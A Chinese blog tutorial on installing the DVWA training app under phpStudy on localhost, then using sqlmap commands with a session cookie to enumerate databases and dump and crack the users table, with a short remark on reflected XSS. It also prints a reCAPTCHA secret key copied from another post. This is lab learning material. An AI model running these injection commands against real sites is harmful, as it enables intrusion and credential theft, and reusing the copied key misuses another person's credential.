phpstudy配置dvwa
首先进入网站下载phpstudy:https://www.xp.cn/download.html
安装完成后下载DVWA:https://dvwa.co.uk/,将DVWA解压在phpstudy目录下的WWW目录,然后将文件夹命名为DVWA,然后进入DVWA\config目录,更改配置文件为config.inc.php
编辑 dvwa/config/config.inc.php这个配置文件
$_DVWA[ ‘recaptcha_public_key’ ] = ‘’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘’;
key可以自己生成,地址是
https://www.google.com/recaptcha/admin/create
借用一下别人生成的
Site key:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
Secret key:
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K
把key填上就行了
$_DVWA[ ‘recaptcha_public_key’ ] = ‘6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K’;
原文链接:https://blog.csdn.net/RBPicsdn/article/details/80059132
然后进入phpstudy目录下的Extensions\php\php7.3.4nts目录,编辑php.ini,ctrl+F搜索allow_
保存退出,打开phpstudy
进入http://127.0.0.1/DVWA/setup.php,创建一下。然后登陆,登录账号名称为admin password
sql注入练习
安装sqlmap:http://sqlmap.org/ python环境:https://www.python.org/downloads/
登录后选择SQL Injection板块,F12-network,随便提交一个数据,进行抓取cookie
将cookie复制下来,然后cmd进入sqlmap文件夹下,输入:
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" --dbs
然后一路y同意,即可检索出数据库。
爆表名
因为我们是dvwa,所以数据库名选择dvwa,然后爆dvwa的表名
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa --tables
我们肯定是对users感兴趣啊,要的就是账号和密码,所以接下来爆users中的列名
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa -T users --columns
得到列名如下,我们感兴趣的是user和password:
爆账号和密码
接下来就是爆user和password中的数据了,这里我想说的是,你可以在爆数据的时候直接MD5解密,到时候会有选项提示,问你是否用kali中自带的字典进行解密
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa -T users -C user,password --dump
最终得到账号和密码,达到目的
xss攻击dvwa
调成low难度后,在xss(reflected)里,输入什么返回什么,而GET传参,未出现明显的过滤,输入提交后有明显弹窗。
更多请参考:https://blog.csdn.net/h1012946585/article/details/82500018